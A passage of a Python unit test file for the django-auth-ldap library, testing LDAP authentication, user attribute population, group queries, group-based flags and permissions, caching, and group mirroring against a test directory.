(\"DEBUG\", \"Binding as %s\", (dn,)),\n (\"DEBUG\", \"Creating Django user %s\", (\"alice\",)),\n (\"DEBUG\", \"Populating Django user %s\", (\"alice\",)),\n (\"DEBUG\", \"Binding as %s\", (\"\",)),\n (\n \"DEBUG\",\n \"Invoking search_s('%s', %s, '%s')\",\n (dn, 0, \"(objectClass=*)\"),\n ),\n (\n \"DEBUG\",\n \"search_s('%s', %s, '%s') returned %d objects: %s\",\n (dn, 0, \"(objectClass=*)\", 1, dn),\n ),\n (\n \"WARNING\",\n \"%s does not have a value for the attribute %s\",\n (dn, \"mail\"),\n ),\n ],\n )\n\n @mock.patch.object(LDAPSearch, \"execute\", return_value=None)\n def test_populate_user_with_bad_search(self, mock_execute):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"\")\n self.assertEqual(user.last_name, \"\")\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_authenticate_with_buggy_setter_raises_exception(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"uid_number\": \"uidNumber\"},\n )\n\n with self.assertRaisesMessage(Exception, \"Oops...\"):\n authenticate(username=\"alice\", password=\"password\")\n\n @_override_settings(AUTH_USER_MODEL=\"tests.TestUser\")\n def test_populate_user_with_buggy_setter_raises_exception(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"uid_number\": \"uidNumber\"},\n )\n\n backend = get_backend()\n with self.assertRaisesMessage(Exception, \"Oops...\"):\n backend.populate_user(\"alice\")\n\n @spy_ldap(\"search_s\")\n def test_populate_with_attrlist(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n USER_ATTRLIST=[\"*\", \"+\"],\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.username, \"alice\")\n\n # lookup user attrs\n mock.assert_called_once_with(\n \"uid=alice,ou=people,o=test\", ldap.SCOPE_BASE, \"(objectClass=*)\", [\"*\", \"+\"]\n )\n\n def test_bind_as_user(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n 
BIND_AS_AUTHENTICATING_USER=True,\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(user.username, \"alice\")\n self.assertEqual(user.first_name, \"Alice\")\n self.assertEqual(user.last_name, \"Adams\")\n\n def test_bind_as_user_with_dn_refetch(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"%(user)[email protected]\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n BIND_AS_AUTHENTICATING_USER=True,\n REFRESH_DN_ON_BIND=True,\n )\n\n # need override to mimic Microsoft AD bind\n # since openldap does not accepts UPN for login\n def _bind_as(_self, bind_dn, bind_password, sticky=False):\n _self._get_connection().simple_bind_s(\n \"cn=charlie_cooper,ou=people,o=test\", bind_password\n )\n _self._connection_bound = sticky\n\n with mock.patch(\"django_auth_ldap.backend._LDAPUser._bind_as\", _bind_as):\n user = authenticate(username=\"charlie\", password=\"password\")\n\n self.assertEqual(user.username, \"charlie\")\n self.assertEqual(user.first_name, \"Charlie\")\n self.assertEqual(user.last_name, \"Cooper\")\n self.assertEqual(user.ldap_user.dn, \"cn=charlie_cooper,ou=people,o=test\")\n\n def test_signal_populate_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n with catch_signal(populate_user) as handler:\n user = authenticate(username=\"alice\", password=\"password\")\n handler.assert_called_once_with(\n signal=populate_user,\n sender=LDAPBackend,\n user=user,\n ldap_user=user.ldap_user,\n )\n\n def test_auth_signal_ldap_error(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n def handle_ldap_error(sender, **kwargs):\n raise kwargs[\"exception\"]\n\n with catch_signal(ldap_error) as handler:\n handler.side_effect = handle_ldap_error\n request = RequestFactory().get(\"/\")\n with self.assertRaises(ldap.LDAPError):\n authenticate(request=request, username=\"alice\", password=\"password\")\n handler.assert_called_once()\n _args, kwargs = handler.call_args\n self.assertEqual(kwargs[\"context\"], \"authenticate\")\n self.assertEqual(kwargs[\"request\"], request)\n\n def test_populate_signal_ldap_error(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n )\n\n backend = get_backend()\n user = backend.populate_user(\"alice\")\n\n self.assertIsNone(user)\n\n def test_no_update_existing(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n ALWAYS_UPDATE_USER=False,\n )\n User.objects.create(username=\"alice\", first_name=\"Alicia\", last_name=\"Astro\")\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertEqual(alice.first_name, \"Alicia\")\n self.assertEqual(alice.last_name, \"Astro\")\n self.assertEqual(bob.first_name, \"Robert\")\n self.assertEqual(bob.last_name, \"Barker\")\n\n def test_require_group(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n 
GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=\"cn=active_gon,ou=groups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNotNone(alice)\n self.assertIsNone(bob)\n\n def test_require_group_with_nonexistent_group(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=LDAPGroupQuery(\"cn=nonexistent,ou=groups,o=test\")\n | LDAPGroupQuery(\"cn=active_gon,ou=groups,o=test\"),\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNotNone(alice)\n self.assertIsNone(bob)\n\n def test_no_new_users(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", NO_NEW_USERS=True\n )\n\n user = authenticate(username=\"alice\", password=\"password\")\n\n # No user was created.\n self.assertIsNone(user)\n self.assertEqual(0, User.objects.count())\n\n def test_simple_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\")\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertEqual(\n [(log.msg, log.args) for log in logs.records],\n [\n (\"Binding as %s\", (\"\",)),\n (\n \"%s is a member of %s\",\n (\n \"uid=alice,ou=people,o=test\",\n \"cn=alice_gon,ou=query_groups,o=test\",\n ),\n ),\n ],\n )\n\n def test_group_query_utf8(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n user = authenticate(username=\"dreßler\", password=\"password\")\n query = LDAPGroupQuery(\"cn=dreßler_gon,ou=query_groups,o=test\")\n self.assertIs(query.resolve(user.ldap_user), True)\n\n def test_negated_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n query = ~LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\")\n self.assertIs(query.resolve(alice.ldap_user), False)\n\n def test_or_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\") | LDAPGroupQuery(\n \"cn=bob_gon,ou=query_groups,o=test\"\n )\n 
self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertIs(query.resolve(bob.ldap_user), True)\n\n def test_and_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\") & LDAPGroupQuery(\n \"cn=mutual_gon,ou=query_groups,o=test\"\n )\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertIs(query.resolve(bob.ldap_user), False)\n\n def test_nested_group_query(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n query = (\n LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\")\n & LDAPGroupQuery(\"cn=mutual_gon,ou=query_groups,o=test\")\n ) | LDAPGroupQuery(\"cn=bob_gon,ou=query_groups,o=test\")\n self.assertIs(query.resolve(alice.ldap_user), True)\n self.assertIs(query.resolve(bob.ldap_user), True)\n\n def test_require_group_as_group_query(self):\n query = LDAPGroupQuery(\"cn=alice_gon,ou=query_groups,o=test\") & LDAPGroupQuery(\n \"cn=mutual_gon,ou=query_groups,o=test\"\n )\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=query_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=query,\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNotNone(alice)\n self.assertIsNone(bob)\n\n def test_group_union(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearchUnion(\n LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n LDAPSearch(\n \"ou=moregroups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n ),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=\"cn=other_gon,ou=moregroups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNone(alice)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.ldap_user.group_names, {\"other_gon\"})\n\n def test_nested_group_union(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearchUnion(\n LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n LDAPSearch(\n \"ou=moregroups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n ),\n GROUP_TYPE=NestedMemberDNGroupType(member_attr=\"member\"),\n REQUIRE_GROUP=\"cn=other_gon,ou=moregroups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNone(alice)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.ldap_user.group_names, 
{\"other_gon\"})\n\n def test_denied_group(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n DENY_GROUP=\"cn=active_gon,ou=groups,o=test\",\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIsNone(alice)\n self.assertIsNotNone(bob)\n\n def test_group_dns(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n alice.ldap_user.group_dns,\n {\n \"cn=active_gon,ou=groups,o=test\",\n \"cn=staff_gon,ou=groups,o=test\",\n \"cn=superuser_gon,ou=groups,o=test\",\n \"cn=nested_gon,ou=groups,o=test\",\n },\n )\n\n def test_group_names(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n alice.ldap_user.group_names,\n {\"active_gon\", \"staff_gon\", \"superuser_gon\", \"nested_gon\"},\n )\n\n def test_dn_group_membership(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n USER_FLAGS_BY_GROUP={\n \"is_active\": LDAPGroupQuery(\"cn=active_gon,ou=groups,o=test\"),\n \"is_staff\": [\n \"cn=empty_gon,ou=groups,o=test\",\n \"cn=staff_gon,ou=groups,o=test\",\n ],\n \"is_superuser\": \"cn=superuser_gon,ou=groups,o=test\",\n },\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(alice.is_superuser, True)\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_user_flags_misconfigured(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n USER_FLAGS_BY_GROUP={\n \"is_active\": LDAPGroupQuery(\"cn=active_gon,ou=groups,o=test\"),\n \"is_staff\": [],\n \"is_superuser\": \"cn=superuser_gon,ou=groups,o=test\",\n },\n )\n\n with self.assertRaises(ImproperlyConfigured):\n authenticate(username=\"alice\", password=\"password\")\n\n def test_posix_membership(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=PosixGroupType(),\n USER_FLAGS_BY_GROUP={\n \"is_active\": \"cn=active_px,ou=groups,o=test\",\n \"is_staff\": \"cn=staff_px,ou=groups,o=test\",\n \"is_superuser\": \"cn=superuser_px,ou=groups,o=test\",\n },\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(alice.is_superuser, True)\n self.assertIs(bob.is_active, False)\n 
self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_nested_dn_group_membership(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=NestedMemberDNGroupType(member_attr=\"member\"),\n USER_FLAGS_BY_GROUP={\n \"is_active\": \"cn=parent_gon,ou=groups,o=test\",\n \"is_staff\": \"cn=parent_gon,ou=groups,o=test\",\n },\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n bob = authenticate(username=\"bob\", password=\"password\")\n\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n\n def test_posix_missing_attributes(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=PosixGroupType(),\n USER_FLAGS_BY_GROUP={\"is_active\": \"cn=active_px,ou=groups,o=test\"},\n )\n\n nobody = authenticate(username=\"nobody\", password=\"password\")\n\n self.assertIs(nobody.is_active, False)\n\n def test_dn_group_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n alice = backend.get_user(alice.pk)\n\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertEqual(\n backend.get_all_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(alice, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(alice, \"auth\"), True)\n\n def test_group_permissions_ldap_error(self):\n self._init_settings(\n BIND_DN=\"uid=bob,ou=people,o=test\",\n BIND_PASSWORD=\"bogus\",\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n alice = backend.get_user(alice.pk)\n\n self.assertEqual(backend.get_group_permissions(alice), set())\n\n def test_empty_group_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n bob = User.objects.create(username=\"bob\")\n bob = backend.get_user(bob.pk)\n\n self.assertEqual(backend.get_group_permissions(bob), set())\n self.assertEqual(backend.get_all_permissions(bob), set())\n self.assertIs(backend.has_perm(bob, \"auth.add_user\"), False)\n self.assertIs(backend.has_module_perms(bob, \"auth\"), False)\n\n def test_posix_group_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=posixGroup)\"\n ),\n GROUP_TYPE=PosixGroupType(),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n alice = backend.get_user(alice.pk)\n\n 
self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertEqual(\n backend.get_all_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(alice, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(alice, \"auth\"), True)\n\n def test_posix_group_permissions_no_gid(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=posixGroup)\"\n ),\n GROUP_TYPE=PosixGroupType(),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n nonposix = User.objects.create(username=\"nonposix\")\n nonposix = backend.get_user(nonposix.pk)\n\n self.assertEqual(\n backend.get_group_permissions(nonposix),\n {\"auth.add_user\", \"auth.change_user\"},\n )\n self.assertEqual(\n backend.get_all_permissions(nonposix), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(nonposix, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(nonposix, \"auth\"), True)\n\n def test_foreign_user_permissions(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n\n self.assertEqual(backend.get_group_permissions(alice), set())\n\n @spy_ldap(\"search_s\")\n def test_group_cache(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n CACHE_TIMEOUT=3600,\n )\n self._init_groups()\n\n backend = get_backend()\n alice_id = User.objects.create(username=\"alice\").pk\n bob_id = User.objects.create(username=\"bob\").pk\n\n # Check permissions twice for each user\n for i in range(2):\n alice = backend.get_user(alice_id)\n self.assertEqual(\n backend.get_group_permissions(alice),\n {\"auth.add_user\", \"auth.change_user\"},\n )\n\n bob = backend.get_user(bob_id)\n self.assertEqual(backend.get_group_permissions(bob), set())\n\n # Should have executed one LDAP search per user\n self.assertEqual(mock.call_count, 2)\n\n def test_group_mirroring(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=posixGroup)\"\n ),\n GROUP_TYPE=PosixGroupType(),\n MIRROR_GROUPS=True,\n )\n\n self.assertEqual(Group.objects.count(), 0)\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(Group.objects.count(), 3)\n self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))\n\n def test_nested_group_mirroring(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n ),\n GROUP_TYPE=NestedMemberDNGroupType(member_attr=\"member\"),\n MIRROR_GROUPS=True,\n )\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(Group.objects.all().values_list(\"name\", flat=True)),\n {\n \"active_gon\",\n \"staff_gon\",\n \"superuser_gon\",\n \"nested_gon\",\n \"parent_gon\",\n \"circular_gon\",\n },\n )\n 
self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))\n\n #\n # When selectively mirroring groups, there are eight scenarios for any\n # given user/group pair:\n #\n # (is-member-in-LDAP, not-member-in-LDAP)\n # x (is-member-in-Django, not-member-in-Django)\n # x (synced, not-synced)\n #\n # The four test cases below take these scenarios four at a time for each of\n # the two settings.\n\n def test_group_mirroring_whitelist_update(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror2\"], groups[\"mirror4\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror1\", \"mirror4\"}\n )\n\n def test_group_mirroring_whitelist_noop(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror1\"], groups[\"mirror3\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror1\", \"mirror3\"}\n )\n\n def test_group_mirroring_blacklist_update(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS_EXCEPT=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror2\"], groups[\"mirror4\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror2\", \"mirror3\"}\n )\n\n def test_group_mirroring_blacklist_noop(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\n \"ou=mirror_groups,o=test\",\n ldap.SCOPE_SUBTREE,\n \"(objectClass=groupOfNames)\",\n ),\n GROUP_TYPE=GroupOfNamesType(),\n MIRROR_GROUPS_EXCEPT=[\"mirror1\", \"mirror2\"],\n )\n\n backend = get_backend()\n groups = {}\n for name in (\"mirror{}\".format(i) for i in range(1, 5)):\n groups[name] = Group.objects.create(name=name)\n alice = backend.populate_user(\"alice\")\n alice.groups.set([groups[\"mirror1\"], groups[\"mirror3\"]])\n\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertEqual(\n set(alice.groups.values_list(\"name\", flat=True)), {\"mirror1\", \"mirror3\"}\n )\n\n def test_authorize_external_users(self):\n self._init_settings(\n 
